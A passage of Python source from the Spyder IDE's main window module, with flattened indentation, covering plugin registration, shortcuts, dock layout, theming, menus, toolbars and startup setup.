# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Set css_path config (to change between light and dark css versions
# for the Help and IPython console plugins)
# TODO: There is a circular dependency between help and ipython
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole,
Plugins.Projects]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self, css_path=css_path)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
if plugin_name == Plugins.Projects:
self.project_path = plugin_instance.get_pythonpath(
at_start=True)
else:
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
